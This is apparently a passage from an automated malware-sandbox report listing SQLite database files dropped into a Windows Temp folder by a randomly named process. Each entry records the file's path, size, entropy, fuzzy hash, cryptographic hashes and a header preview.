                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\9YoYQ8zoHR

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\9csiHL6KGE

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\ABTr0UF6Fl

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\ADXNMB1iVr

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\AiEgi6pyYV

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\Aw4qEoHq57

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\BAD2LPu8Qy

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\BPdzST1OCN

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\Bhv88vhrdo

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\Btlz2DKLK4

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\C5RnvrhiAB

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\CEv15cF014

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\CHkEvasiUn

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\CRnuslNOxA

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\CUQpcyWhbq

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\CkKMmUnIml

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\CygqHaAhsK

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\DNMF6zyqwW

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\DQN6MKEYmV

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\DUHhKhv0yw

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\Dt4B5fdUlB

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\DtyjEy2fpb

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\E5vo8p2UhJ

